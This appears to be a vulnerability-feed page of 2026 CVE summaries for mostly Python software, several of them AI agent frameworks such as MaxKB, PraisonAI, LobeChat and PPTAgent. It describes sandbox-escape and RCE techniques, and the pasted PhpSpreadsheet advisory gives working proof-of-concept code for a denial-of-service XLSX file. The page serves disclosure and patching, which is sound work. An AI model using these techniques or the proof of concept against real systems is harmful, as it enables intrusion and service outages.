MaxKB versions 2.7.1 and below allow authenticated users to spoof tool execution results by exploiting Python frame introspection to extract the wrapper's UUID from bytecode, then writing forged output directly to file descriptor 1 to bypass stdout redirection and terminate the wrapper process before legitimate output is generated, causing the service to trust the attacker-controlled response. This integrity bypass requires prior authentication and local/network access but enables attackers to manipulate AI tool results without detection. The vulnerability has been patched in version 2.8.0.

Authentication Bypass Python
NVD GitHub
CVSS 3.1
3.1
EPSS
0.0%
CVE-2026-39421 MEDIUM PATCH This Month

MaxKB versions 2.7.1 and below allow authenticated attackers with workspace privileges to execute arbitrary code by exploiting a sandbox escape vulnerability in the ToolExecutor component. By leveraging Python's ctypes library to invoke raw system calls and bypassing the LD_PRELOAD-based sandbox.so module through the unblocked pkey_mprotect syscall, attackers can achieve remote code execution, enabling network exfiltration and container compromise. This vulnerability is confirmed fixed in version 2.8.0, and no public exploit code has been identified at time of analysis.

RCE Python
NVD GitHub
CVSS 3.1
6.3
EPSS
0.1%
CVE-2026-39420 MEDIUM PATCH This Month

MaxKB versions 2.7.1 and below allow authenticated users with tool execution privileges to bypass the LD_PRELOAD-based sandbox via the env command, enabling unrestricted remote code execution and network access. The vulnerability stems from a patch that permitted execution of /usr/bin/env, which attackers can exploit using env -i to clear environment variables and drop the sandbox.so hook before spawning a native Python subprocess. Vendor-released patch: version 2.8.0.

RCE Python
NVD GitHub
CVSS 3.1
6.3
EPSS
0.2%
CVE-2026-4810 PyPI CRITICAL POC PATCH GHSA HOSTED Monitor

Remote code execution in Google Agent Development Kit (ADK) versions 1.7.0-1.28.0 and 2.0.0a1 allows unauthenticated remote attackers to execute arbitrary code on ADK server instances via combined code injection and missing authentication flaws. Affects Python OSS deployments, Cloud Run, and GKE environments. CVSS 9.3 critical severity with proof-of-concept code available (CVSS:4.0 E:P). No CISA KEV listing indicates no confirmed widespread exploitation at time of analysis, though the authentication bypass combined with RCE presents extreme risk for exposed instances.

Authentication Bypass Google RCE Python
NVD GitHub VulDB
CVSS 4.0
9.3
EPSS
0.3%
CVE-2026-40258 PyPI CRITICAL PATCH GHSA Act Now

Path traversal (Zip Slip) in gramps-web-api media archive import allows authenticated owner-privileged users to write arbitrary files outside intended directories via malicious ZIP archives. Exploitation requires owner-level access and enables cross-tree data corruption in multi-tree SQLite deployments or config file overwrite in volume-mounted configurations. Postgres+S3 deployments limit impact to ephemeral container storage. No public exploit identified at time of analysis.

PostgreSQL Python Path Traversal Docker
NVD GitHub
CVSS 3.1
9.1
EPSS
0.1%
CVE-2026-40159 PyPI MEDIUM PATCH GHSA This Month

PraisonAI before version 4.5.128 exposes sensitive environment variables to untrusted subprocess commands executed through its MCP (Model Context Protocol) integration, enabling credential theft and supply chain attacks when third-party tools like npx packages are invoked. An unauthenticated local attacker with user interaction can trigger MCP commands that inherit the parent process environment, gaining access to API keys, authentication tokens, and database credentials without the knowledge of developers using PraisonAI. The vulnerability is fixed in version 4.5.128.

Python Information Disclosure RCE
NVD GitHub
CVSS 3.1
5.5
EPSS
0.0%
CVE-2026-40158 PyPI HIGH PATCH GHSA This Week

Arbitrary code execution in PraisonAI multi-agent system (<4.5.128) via Python sandbox escape. Incomplete AST attribute filtering allows type.__getattribute__ trampoline to bypass restrictions on __subclasses__, __globals__, and __bases__, enabling untrusted agent code to break containment. Attack requires local access and user interaction to execute malicious code. No public exploit identified at time of analysis.

RCE Python Code Injection
NVD GitHub
CVSS 3.1
8.6
EPSS
0.0%
CVE-2026-35602 Go MEDIUM PATCH GHSA This Month

Vikunja's file import endpoint bypasses configured maximum file size limits by trusting an attacker-controlled Size field in import metadata rather than validating actual decompressed file content. Authenticated users can upload small compressed zip files (e.g., ~25KB) containing files up to 25MB or larger, exhausting server storage and causing denial of service across all users. The vulnerability affects Vikunja v2.2.2 and earlier versions; a vendor-released patch is available in v2.3.0.

Python Denial Of Service
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-35601 Go MEDIUM PATCH GHSA This Month

CalDAV output generator in Vikunja allows authenticated users to inject arbitrary iCalendar properties via CRLF characters in task titles, bypassing RFC 5545 TEXT value escaping requirements. An attacker with project write access can craft malicious task titles that break iCalendar property boundaries, enabling injection of fake ATTACH URLs, VALARM notifications, or ORGANIZER spoofing when other users sync via CalDAV. Patch available in version 2.3.0; requires user interaction (calendar sync) to trigger on other users' clients.

RCE Python
NVD GitHub
CVSS 3.1
4.1
EPSS
0.0%
CVE-2026-35600 Go MEDIUM PATCH GHSA This Month

Vikunja task title injection in overdue email notifications allows authenticated attackers to embed phishing links and tracking pixels in legitimate SMTP emails by breaking Markdown link syntax with special characters. The vulnerability affects task notification rendering across multiple notification types in Vikunja prior to v2.3.0, where task titles are concatenated directly into Markdown without escaping, survive goldmark rendering and bluemonday sanitization (which intentionally permits <a> and <img> tags), and reach email recipients as trusted-source links within official Vikunja notifications.

XSS Python
NVD GitHub
CVSS 3.1
5.4
EPSS
0.0%
CVE-2026-35599 Go MEDIUM PATCH GHSA This Month

Denial of service in Vikunja via algorithmic complexity attack in the addRepeatIntervalToTime function allows authenticated users to exhaust server CPU and database connections by creating repeating tasks with 1-second intervals and dates far in the past (e.g., 1900), triggering billions of loop iterations that hang requests for 60+ seconds and exhaust the default 100-connection pool. CVSS 6.5 with authenticated attack vector; confirmed patched in v2.3.0.

Python Information Disclosure
NVD GitHub
CVSS 3.1
6.5
EPSS
0.0%
CVE-2026-35598 Go MEDIUM PATCH GHSA This Month

Vikunja task authorization bypass in CalDAV allows authenticated users to read arbitrary task details from any project by knowing a task UID, bypassing REST API permission checks. The GetResource and GetResourcesByList CalDAV methods query tasks by UID without verifying the authenticated user has project access, enabling information disclosure of task titles, descriptions, due dates, and other metadata across organizational boundaries in multi-tenant deployments. Patch available in v2.3.0.

Python Authentication Bypass
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-35597 Go MEDIUM PATCH GHSA This Month

Vikunja API brute-forces TOTP codes by exploiting a database transaction rollback bug that prevents account lockout persistence. When TOTP validation fails, the login handler rolls back the database session containing the failed-attempt counter increment and account lock status, leaving the lockout mechanism non-functional while per-IP rate limiting can be bypassed via distributed attack. Unauthenticated remote attackers who possess a user's password can exhaust the 6-digit TOTP code space (only 1 million combinations) and gain unauthorized access. Patch is available as of Vikunja v2.3.0.

Python Authentication Bypass
NVD GitHub
CVSS 3.1
5.9
EPSS
0.0%
CVE-2026-35596 Go MEDIUM PATCH GHSA This Month

Vikunja API versions prior to 2.3.0 allow authenticated users to read any label metadata and creator information across projects via SQL operator precedence flaw in the hasAccessToLabel function. Any label attached to at least one task becomes readable to all authenticated users regardless of project access permissions, enabling cross-project information disclosure of label titles, descriptions, colors, and creator usernames. The vulnerability requires prior authentication (PR:L per CVSS vector) and carries low complexity attack surface with direct impact to confidentiality. No public exploit code beyond the proof-of-concept in the advisory has been identified, and vendor-released patch version 2.3.0 is available.

Python Information Disclosure Authentication Bypass
NVD GitHub
CVSS 3.1
4.3
EPSS
0.0%
CVE-2026-35595 Go HIGH PATCH GHSA This Week

Privilege escalation in Vikunja API (v2.2.2 and prior) allows authenticated users with Write permission on a shared project to escalate to Admin by reparenting the project under their own hierarchy. The vulnerability exploits insufficient authorization checks in project reparenting (CanWrite instead of IsAdmin), causing the recursive permission CTE to grant Admin rights. Attackers can then delete projects, remove user access, and manage sharing settings. Publicly available exploit code exists.

Python Privilege Escalation
NVD GitHub
CVSS 3.1
8.3
EPSS
0.0%
EPSS 0% CVSS 7.2
HIGH PATCH This Week

Unauthenticated remote code execution in AVideo ≤29.0 allows attackers to inject and execute arbitrary JavaScript in the browsers of any logged-in users through a WebSocket message relay bypass. An attacker obtains a WebSocket token without authentication from plugin/YPTSocket/getWebSocket.json.php, connects to the WebSocket server, and sends a crafted message with autoEvalCodeOnHTML nested under the json field instead of msg. The incomplete server-side sanitization from prior fix c08694bf6 (GHSA-gph2-j4c9-vhhr) only strips autoEvalCodeOnHTML from $json['msg'], but the relay function msgToResourceId() preferentially selects $msg['json'] as the outbound message carrier. The payload bypasses sanitization, reaches the victim's browser via WebSocket relay, and executes through eval() at plugin/YPTSocket/script.js:573-575. Vendor-released patch: commit 9f3006f9a (recursive stripping across all message carriers). No public exploit identified at time of analysis, but the advisory includes functional proof-of-concept Python code.

PHP CSRF Python +4
NVD GitHub
EPSS 0% CVSS 6.2
MEDIUM This Month

Stored XSS in LobeChat's message rendering escalates to remote code execution via exposed Electron IPC when victims configure an attacker-controlled LLM provider endpoint. The vulnerability chains unfiltered HTML rendering with an unauthenticated shellCommand IPC handler that executes arbitrary system commands at user privilege level. Confirmed in versions up to 2.1.26; patch released in v2.1.48. Public proof-of-concept demonstrates opening arbitrary applications via malicious LLM API responses.

Python Command Injection XSS +1
NVD GitHub
EPSS 0% CVSS 8.5
HIGH PATCH This Week

Server-Side Request Forgery in edx-enterprise 7.0.2-7.0.4 enables Enterprise Admins to steal cloud credentials and scan internal networks. Authenticated users with the Enterprise Admin role-typically delegated to training managers, not platform operators-can inject arbitrary URLs into SAMLProviderConfig.metadata_source and trigger server-side HTTP requests to internal infrastructure. Publicly available exploit code exists (proof-of-concept in GitHub advisory GHSA-64cv-vxpr-j6vc). Vendor-released patch: edx-enterprise 7.0.5. This mirrors a previously patched SSRF in openedx-platform (GHSA-328g-7h4g-r2m9), indicating recurring pattern in SAML metadata handling across Open edX components.

Python SSRF Microsoft
NVD GitHub
EPSS 0% CVSS 7.6
HIGH PATCH This Week

Cross-Origin Resource Sharing (CORS) bypass in Jupyter Server <= 2.17.0 allows attackers controlling malicious subdomains to bypass origin validation and access sensitive notebook data. The vulnerability stems from incorrect use of Python's re.match() function in the allow_origin_pat configuration, which only anchors at the start of strings. An attacker registering a domain like 'trusted.example.com.evil.com' can pass validation intended only for 'trusted.example.com', enabling unauthorized cross-origin requests to Jupyter sessions. Fixed in version 2.18.0 via commits 057869a and 49b3439. No active exploitation or public POC identified at time of analysis.

Python Information Disclosure
NVD GitHub VulDB
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Django 6.0 before 6.0.5 and 5.2 before 5.2.14 fail to vary response headers on session cookies when SESSION_SAVE_EVERY_REQUEST is enabled but the session is unmodified, allowing remote attackers with user interaction to steal session tokens from cached public pages. The vulnerability affects server configurations that cache responses aggressively while maintaining per-request session handling, exposing authenticated users to session hijacking after visiting pages served from cache.

Python Information Disclosure
NVD VulDB
EPSS 0% CVSS 2.3
LOW PATCH Monitor

Django's UpdateCacheMiddleware incorrectly caches HTTP responses containing a Vary header with an asterisk value in versions 6.0 before 6.0.5 and 5.2 before 5.2.14, causing private user data to be cached and served to other users. The vulnerability has low confidentiality impact and requires user interaction (UI:P) combined with passive attack timing, making real-world exploitation dependent on specific cache timing conditions and application architecture.

Python Information Disclosure
NVD VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Django 6.0 before 6.0.5 and 5.2 before 5.2.14 allow remote attackers to bypass the FILE_UPLOAD_MAX_MEMORY_SIZE limit by submitting ASGI requests with missing or understated Content-Length headers, potentially loading large files into memory and causing denial of service through resource exhaustion. No active exploitation confirmed, but the vulnerability requires only network access and no authentication, making it trivially exploitable once the bypass is understood.

Authentication Bypass Python Suse +1
NVD VulDB
EPSS 0% CVSS 5.5
MEDIUM POC This Month

Path traversal in UsamaK98 python-notebook-mcp allows remote unauthenticated attackers to read, write, and manipulate notebook files outside their intended directory via crafted input to the create_notebook, read_notebook, edit_cell, and add_cell functions in server.py. Public exploit code is available. The project uses rolling releases with no versioning, and the vendor has not yet responded to the initial issue report despite early notification.

Python Path Traversal
NVD VulDB GitHub
EPSS 0% CVSS 8.3
HIGH PATCH This Week

Authenticated users with non-admin SETTINGS permission in pyload-ng ≤0.5.0b3.dev99 can redirect all outbound HTTP traffic through attacker-controlled proxies by modifying ungated proxy configuration fields (enabled, host, port, type). The vulnerability is an incomplete fix in a series of authorization bypass issues (CVE-2026-33509/-35463/-35464/-35586) where a hand-maintained allowlist in set_config_value() gates only proxy credentials (username/password) but not the proxy destination itself, allowing credential theft, traffic interception, and response injection across downloads, captcha solvers, and update checks. No public exploit identified at time of analysis, though the GitHub advisory includes a working proof-of-concept demonstrating traffic redirection via API calls. Patch confirmed in version 0.5.0b3.dev100 per vendor advisory GHSA-pg67-9wjv-mr85.

Python Information Disclosure
NVD GitHub
EPSS 0% CVSS 6.8
MEDIUM PATCH This Month

Non-admin users holding the SETTINGS permission in pyload-ng can disable TLS peer and hostname verification by setting general.ssl_verify=off via the set_config_value() API, enabling man-in-the-middle attacks on all outbound HTTPS requests including downloads, captcha fetches, and plugin calls. This is an incomplete fix for a series of prior allowlist bypasses (CVE-2026-33509, CVE-2026-35463, CVE-2026-35464, CVE-2026-35586) in which security-sensitive configuration options were omitted from the ADMIN_ONLY_CORE_OPTIONS allowlist.

Python SSRF Privilege Escalation
NVD GitHub VulDB
EPSS 0% CVSS 9.3
CRITICAL Act Now

Remote code execution in ArchiveBox <= 0.8.6rc0 allows unauthenticated attackers to execute arbitrary commands on the server via unvalidated config injection in the /add/ endpoint. When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), attackers inject malicious environment variables through the config JSON parameter that propagate to archive plugins like yt-dlp and gallery-dl, enabling command execution via --exec flags. The endpoint lacks both input validation and CSRF protection. CVSS 9.3 (Critical) with network vector, low complexity, and no authentication required. Public proof-of-concept exploit exists demonstrating pre-authentication RCE. No vendor-released patch identified at time of analysis.

Python RCE
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM PATCH This Month

Quarkus OpenAPI Generator versions before 2.16.0-lts and 2.16.0 (fixed in 2.17.0) send authentication credentials to unintended API endpoints due to overly broad path-parameter regex matching. The generated authentication filter treats OpenAPI path-template placeholders like {param} as .* patterns, allowing a single parameter to consume forward slashes and match multiple distinct operations. This causes bearer tokens, OAuth tokens, API keys, and basic credentials configured for one protected operation to be leaked to different, unprotected operations on the same service when a client invokes them through normal generated-code paths. No public exploit code has been identified, but the vulnerability is trivial to trigger and affects all authentication schemes relying on the shared path-matching logic.

Python Information Disclosure Apache +1
NVD GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Integer overflow in Pillow 10.3.0 through 12.1.1 bypasses bounds checks during PSD tile extent validation, enabling memory corruption and arbitrary code execution when processing malicious PSD files. This vulnerability (CVE-2026-42311) exploits an incomplete fix for CVE-2026-25990, where the original patch added tile extent validation but used overflow-prone integer types. Attackers craft PSD images with tile dimensions that wrap around during extent sum calculations, defeating the bounds checks and triggering out-of-bounds writes in decode.c and encode.c. Pillow 12.2.0 patches this by avoiding extent addition before comparison. No active exploitation confirmed (not in CISA KEV); publicly available exploit code exists via proof-of-concept test images in the patch commit.

Integer Overflow RCE Buffer Overflow +1
NVD GitHub VulDB
EPSS 0% CVSS 5.1
MEDIUM PATCH This Month

Pillow's PDF parser enters an infinite loop when processing maliciously crafted PDF files with circular Prev pointer references in trailer sections, causing 100% CPU consumption and application hang. All versions from 4.2.0 through 12.1.x are affected. The vulnerability is a denial-of-service condition affecting any application using Pillow to parse untrusted PDFs. Vendor-released patch: version 12.2.0.

Denial Of Service Python Red Hat +1
NVD GitHub VulDB
EPSS 0% CVSS 6.9
MEDIUM PATCH This Month

Traefik's errors middleware discloses sensitive HTTP headers including Authorization and Cookie to separate error page services when backends return configured error status codes. Affected versions are Traefik v2.11.43 and earlier, v3.6.14 and earlier, and v3.7.0-rc.0 through v3.7.0-rc.2. The vulnerability allows credentials meant only for backend services to be forwarded to distinct error page infrastructure, expanding exposure across service boundaries. Vendor-released patches are available; actively exploited status not confirmed.

Python Docker Information Disclosure +1
NVD GitHub VulDB
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Nil-pointer dereference in Incus daemon's storage bucket import logic allows authenticated users to crash the daemon by submitting a malformed bucket backup archive with a missing config section in index.yaml, enabling denial of service through repeated exploitation. The vulnerability affects Incus versions prior to 7.0.0 and requires valid storage bucket feature access but no special privileges beyond authenticated user status.

Null Pointer Dereference Denial Of Service Python +1
NVD GitHub
EPSS 0% CVSS 9.6
CRITICAL PATCH Act Now

Privilege escalation in OpenC3 COSMOS allows low-privileged authenticated users to bypass API authorization and perform administrative actions by executing crafted Python or Ruby scripts via the Script Runner widget. Attackers can directly access Redis database (exposing secrets and configuration settings) and the MinIO buckets service (containing logs, configs, and plugins) due to unrestricted container-to-container network access in the Docker deployment. Vendor-released patch available in version 7.0.0-rc3 and confirmed in 7.0.0 stable release. EPSS data not available; no CISA KEV listing indicates targeted rather than widespread exploitation. CVSS 9.6 (Critical) with scope change reflects the container escape-like privilege boundary violation.

Privilege Escalation Redis Python +1
NVD GitHub VulDB
EPSS 0% CVSS 9.2
CRITICAL PATCH Act Now

Remote code execution in Arelle webserver (versions prior to 2.39.10) allows unauthenticated attackers to execute arbitrary Python code by submitting malicious plugin URLs to the /rest/configure endpoint. The vulnerability stems from the webserver's plugin manager accepting and executing external Python files without authentication or URL validation. A patch is available in version 2.39.10 (GitHub PR #2320). CVSS 9.8 with network vector, no privileges required, and EPSS data not provided. No CISA KEV listing or confirmed active exploitation at time of analysis.

Authentication Bypass Python RCE
NVD GitHub
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Arbitrary code execution in PPTAgent allows local attackers to execute Python code by exploiting unsafe eval() of LLM-generated content with unrestricted builtins. The framework's agentic architecture passes AI-generated code directly to eval() with full builtin access, enabling execution of arbitrary system commands. Patch available via commit 418491a which restricts eval() globals to an empty builtins dictionary and adds path traversal protections. CVSS 8.6 with local attack vector and user interaction requirement; no evidence of active exploitation or public POC at time of analysis.

RCE Python Code Injection
NVD GitHub
EPSS 0% CVSS 8.7
HIGH POC This Week

Remote code execution in NetBox 4.3.5-4.5.4 allows authenticated users with exporttemplate or configtemplate permissions to execute arbitrary Python code as the NetBox service user by injecting malicious callables into Jinja2 template environment parameters. Attackers bypass SandboxedEnvironment protections by setting the finalize parameter to dangerous imports like subprocess.getoutput, which executes on every rendered expression outside sandbox call interception. Public proof-of-concept exploit exists (chocapikk.com), and upstream patch available via GitHub PR #22078 implements an allowlist-based validation mechanism that blocks unauthorized callable resolution at both save-time and render-time.

Python RCE
NVD GitHub VulDB
EPSS 0% CVSS 6.3
MEDIUM This Month

Unsafe deserialization in SGLang's HuggingFace Transformer Handler allows remote attackers to trigger deserialization attacks via the get_tokenizer function in versions up to 0.5.9, potentially leading to code execution or information disclosure. The vulnerability requires high attack complexity and has not been patched despite early vendor notification.

Python Deserialization
NVD VulDB GitHub
EPSS 0% CVSS 8.4
HIGH PATCH This Week

Unsafe deserialization in Zurich Instruments LabOne Q enables arbitrary code execution when users load malicious experiment files. The import_cls mechanism accepts unvalidated class names from serialized data, allowing attackers to instantiate arbitrary Python classes with controlled constructor arguments. Exploitation requires user interaction to open a crafted file, making this a credible vector for supply chain attacks via shared experiment configurations or support tickets. CVSS 8.4 reflects local attack vector with user interaction requirement. No confirmed active exploitation or public POC at time of analysis.

Python Deserialization RCE
NVD
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Arbitrary code execution in OpenStack ironic-python-agent (IPA) versions 1.0.0 through 11.5.0 occurs because IPA runs grub-install from inside a chroot of the partition image it is deploying, so binaries supplied by a malicious image execute on the provisioning ramdisk. An attacker able to have a crafted partition image deployed can run code in the IPA context (typically root on the bare-metal node being provisioned). No public exploit identified at time of analysis; EPSS is negligible (0.01%) and CISA SSVC records exploitation status as none, but the technical impact is rated total.

Python RCE Ironic Python Agent
NVD GitHub VulDB
EPSS 0% CVSS 5.3
MEDIUM PATCH This Month

Authenticated Server-Side Request Forgery (SSRF) in Weblate before 5.17.1 allows users with project.add permission to import crafted project backup ZIPs containing malicious repository URLs pointing to private addresses or using non-allowlisted schemes (file://, git://) that bypass URL validation. The vulnerability exists because bulk_create() circumvents Django's full_clean() validator; attackers can write arbitrary URLs into .git/config, enabling SSRF attacks against internal systems or protocol exploitation.

Python Authentication Bypass Suse
NVD GitHub
EPSS 0% CVSS 5.9
MEDIUM PATCH This Month

Apache Airflow's SmtpHook performs STARTTLS upgrades without SSL certificate validation, allowing man-in-the-middle attackers to intercept SMTP credentials. Remote unauthenticated attackers positioned between an Airflow worker and SMTP server can present a self-signed certificate, complete the TLS handshake, and capture login credentials sent after the upgrade. The vulnerability affects apache-airflow-providers-smtp versions 2.0.0 through 2.x and is patched in version 3.0.0 or later. No public exploit code identified at time of analysis, but EPSS score of 0.01% indicates low real-world exploitation probability despite confidentiality impact.

Apache Python Information Disclosure
NVD GitHub
EPSS 0% CVSS 2.0
LOW Monitor

Remote code execution in django-mdeditor (all versions prior to commit 3e80f9e) allows unauthenticated attackers to upload malicious files via the image upload endpoint. The vulnerability combines missing authentication (CWE-306) with insufficient filename sanitization, enabling arbitrary code execution when uploaded files are accessed. Exploit code is publicly available (CVSS E:P), though user interaction is required (UI:R). EPSS data not available, not listed in CISA KEV at time of analysis.

Authentication Bypass RCE Python
NVD GitHub VulDB
EPSS 0% CVSS 5.2
MEDIUM PATCH This Month

Admidio 5.0.8 and earlier allows authenticated administrators to remove all other administrators from the system via Role::stopMembership(), which lacks a minimum-administrator-count validation check. Two colluding or compromised admin accounts can sequentially remove each other, leaving zero administrators and locking administrative access. The vulnerability requires high privileges (PR:H) and user interaction (UI:R) but results in complete denial of administrative access once exploited.

PHP Authentication Bypass Python
NVD GitHub
EPSS 0% CVSS 7.1
HIGH PATCH This Week

Sandbox escape in n8n's Python Task Runner enables authenticated workflow editors to execute arbitrary code on the task runner container. This vulnerability (CWE-94: Improper Control of Generation of Code) affects n8n instances with the Python Code Node feature enabled, allowing attackers with workflow creation/modification permissions to break out of the Python sandbox. Vendor-released patches are available in versions 1.123.32, 2.17.4, and 2.18.1. No public exploit identified at time of analysis, though the technical details in the GitHub advisory provide sufficient information for exploitation by authenticated users.

RCE Python Code Injection
NVD GitHub VulDB
EPSS 0% CVSS 6.1
MEDIUM PATCH This Month

CKAN versions 2.10.0 through 2.10.9 and 2.11.0 through 2.11.4 allow unauthenticated requests to permanently disable CSRF protection on endpoints for the lifetime of the server process by triggering a state mutation in the flask-wtf CSRFProtect middleware. Combined with cross-site scripting, an attacker can exploit this to perform authenticated actions using other users' credentials. The vulnerability affects network-accessible CKAN instances with default configurations and has CVSS 6.1 with user interaction required.

XSS CSRF Python
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

## Summary The XLSX reader's `ColumnAndRowAttributes::readRowAttributes()` method reads row numbers from XML attributes without validating them against the spreadsheet maximum row limit (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a minimal XLSX file (~1.6KB) containing a `<row r="999999999"/>` element that inflates `cachedHighestRow` to 999,999,999, causing any subsequent row iteration to attempt ~1 billion loop cycles and exhaust CPU resources. ## Details In `src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php` at line 216, the row index is cast directly from XML without bounds checking: ```php // ColumnAndRowAttributes.php:216 $rowIndex = (int) $row['r']; // No validation against AddressRange::MAX_ROW ``` This value flows through `setRowAttributes()` (line 126) → `$this->worksheet->getRowDimension($rowNumber)` (line 60), which updates the cached highest row in `Worksheet.php:1348`: ```php // Worksheet.php:1342-1349 public function getRowDimension(int $row): RowDimension { if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` The inflated `cachedHighestRow` is then returned by `getHighestRow()` (line 1099) and used as the default end bound in `RowIterator::resetEnd()` (RowIterator.php:86): ```php // RowIterator.php:86 $this->endRow = $endRow ?: $this->subject->getHighestRow(); ``` Notably, column attributes already have equivalent validation at line 161 (`AddressRange::MAX_COLUMN_INT`), and cell coordinates are validated in `Coordinate::coordinateFromString()` (line 40) against `MAX_ROW`. The row dimension attribute path bypasses both of these checks. ## PoC **Step 1: Create the malicious XLSX file (~1.6KB)** ```python import zipfile import io content_types = '<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/></Types>' rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/></Relationships>' workbook = '<?xml version="1.0" encoding="UTF-8"?><workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets></workbook>' wb_rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/></Relationships>' sheet = '<?xml version="1.0" encoding="UTF-8"?><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData><row r="1"><c r="A1"><v>1</v></c></row><row r="999999999" ht="15"/></sheetData></worksheet>' with zipfile.ZipFile('dos_row.xlsx', 'w', zipfile.ZIP_DEFLATED) as zf: zf.writestr('[Content_Types].xml', content_types) zf.writestr('_rels/.rels', rels) zf.writestr('xl/workbook.xml', workbook) zf.writestr('xl/_rels/workbook.xml.rels', wb_rels) zf.writestr('xl/worksheets/sheet1.xml', sheet) print("Created dos_row.xlsx") ``` **Step 2: Load with PhpSpreadsheet (CPU exhaustion)** ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xlsx'); $spreadsheet = $reader->load('dos_row.xlsx'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Output: Highest row: 999999999 // This will consume CPU for ~144 seconds (999M iterations) foreach ($sheet->getRowIterator() as $row) { // CPU exhaustion } ``` **Expected output:** `getHighestRow()` returns 999999999. Any row iteration hangs indefinitely. ## Impact - **CPU Denial of Service:** A 1.6KB crafted XLSX file causes ~999 million loop iterations in any application that iterates rows using `getRowIterator()` or uses `getHighestRow()` as a loop bound. Estimated CPU burn is ~144 seconds per file. - **Memory Exhaustion:** Applications that accumulate data during iteration (e.g., importing rows into a database, building arrays) will also exhaust memory. - **Amplification:** The ratio of input size to resource consumption is extreme - 1,580 bytes triggers nearly 1 billion iterations. - **Common Attack Surface:** PhpSpreadsheet is widely used in web applications that accept user-uploaded spreadsheets for import/processing, making this easily exploitable remotely. ## Recommended Fix Add row bounds validation in `readRowAttributes()` at line 216, matching the column validation pattern already present at line 161: ```php // src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php:216 // Before: $rowIndex = (int) $row['r']; // After: $rowIndex = (int) $row['r']; if ($rowIndex < 1 || $rowIndex > AddressRange::MAX_ROW) { continue; } ``` The `AddressRange` import is already present at line 5 of this file. This fix is consistent with the existing cell coordinate validation in `Coordinate::coordinateFromString()` and the column validation at line 161.

PHP Python Denial Of Service
NVD GitHub
EPSS 0% CVSS 7.7
HIGH PATCH This Week

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers can induce requests to the local AgentFlow API to load and execute existing Python pipeline files on disk, resulting in code execution in the context of the user running AgentFlow.

Python Code Injection RCE
NVD GitHub VulDB
EPSS 0% CVSS 9.0
CRITICAL POC PATCH Act Now

Wazuh Manager (4.4.0 through 4.14.3) contains a path traversal vulnerability in the cluster synchronization routine that allows an authenticated cluster peer to write arbitrary files outside the intended extraction directory on other cluster nodes. Writing to sensitive locations such as cron directories or Python module paths leads to remote code execution. CVSS 9.0 Critical (network-accessible, high privilege required, scope changed). Patch available in v4.14.4; no active exploitation identified.

RCE Python Path Traversal +1
NVD GitHub VulDB
EPSS 0% CVSS 8.7
HIGH PATCH This Week

### Summary CoreDNS's DNS-over-HTTPS (DoH) GET path accepts oversized `dns=` query values and performs substantial request parsing, query unescaping, base64 decoding, and message unpacking work before returning `400 Bad Request`. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to `/dns-query?dns=...` and force high CPU usage, large transient allocations, elevated garbage-collection pressure, and increased resident memory consumption even though the requests are ultimately rejected. This is a denial-of-service issue caused by expensive pre-validation processing on the DoH GET path. ### Details The vulnerable flow is in `plugin/pkg/doh/doh.go`: - `RequestToMsg()` dispatches GET requests to `requestToMsgGet()`: - `plugin/pkg/doh/doh.go:79-89` - `requestToMsgGet()` calls `req.URL.Query()`, extracts `dns`, and passes it directly to `base64ToMsg()`: - `plugin/pkg/doh/doh.go:99-108` - `base64ToMsg()` decodes the full attacker-controlled value via `b64Enc.DecodeString()` and only then attempts to unpack it into a DNS message: - `plugin/pkg/doh/doh.go:121-130` Relevant snippet: ```go func requestToMsgGet(req *http.Request) (*dns.Msg, error) { values := req.URL.Query() b64, ok := values["dns"] if !ok { return nil, fmt.Errorf("no 'dns' query parameter found") } if len(b64) != 1 { return nil, fmt.Errorf("multiple 'dns' query values found") } return base64ToMsg(b64[0]) } func base64ToMsg(b64 string) (*dns.Msg, error) { buf, err := b64Enc.DecodeString(b64) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ```` By contrast, the POST path applies a bounded read before unpacking: ```go func toMsg(r io.ReadCloser) (*dns.Msg, error) { buf, err := 